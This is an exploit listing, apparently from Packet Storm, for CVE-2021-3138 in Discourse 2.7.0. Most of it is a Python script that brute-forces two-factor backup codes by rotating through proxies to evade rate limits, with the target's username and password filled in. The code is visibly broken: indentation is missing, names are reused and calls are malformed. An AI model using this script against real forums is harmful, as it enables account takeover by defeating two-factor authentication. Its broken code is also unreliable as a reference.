Share
## https://sploitus.com/exploit?id=PACKETSTORM:162256
# Exploit Title: Discourse 2.7.0 - Rate Limit Bypass leads to 2FA Bypass  
# Date: 14/01/2021  
# Exploit Author: Mesh3l_911  
# Vendor Homepage: https://www.discourse.org/  
# Software Link:https://github.com/discourse/discourse  
# Version: Discourse 2.7.0  
# CVE: CVE-2021-3138  
  
import requests  
  
username = input("\n input ur username : ")  
password = input("\n input ur password : ")  
session=requests.session()  
  
proxies = []  
def proxies():  
proxies_path = input("\n input ur proxies path : ")  
  
with open(proxies_path, 'r') as prox:  
for _ in prox.read().splitlines():  
proxies.append()  
  
backup_codes = []  
def backup_list():  
Backup_codes = input("\n input ur Backup_codes list path : ")  
  
with open(Backup_codes, 'r') as codes:  
for _ in codes.read().splitlines():  
backup_codes.append()  
  
def exploit():  
with open('Backup_codes.txt', 'w') as results:  
try:  
for __ in proxies:  
for _ in codes.read().splitlines():  
header =\  
{  
"X-CSRF-Token": "ur X-CSRF-Token",  
"Cookie": "ur Cookie",  
"X-Requested-With": "XMLHttpRequest"  
}  
body = {"login": username, "password": password, "second_factor_token": _, "second_factor_method": "2"}  
request = session.post("ur target_url", headers=header, data=body, proxies={'http': __, 'https':__})  
source = request.text  
backup_codes.remove(_)  
  
if request.status_code == 200:  
if '"id"' in source:  
results.write("The Backup_Coude is > {} ".format(_))  
return True  
else:  
pass  
else:  
proxies.remove(__)  
break  
  
  
except requests.exceptions.SSLError and requests.exceptions.ConnectionError:  
print(" Connection Failed :( ")  
  
results.close()  
  
  
def main():  
if exploit():  
print("\n Found :) \n")  
else:  
print("\n Please re-check ur inputs :( \n")  
if __name__ == '__main__':  
main()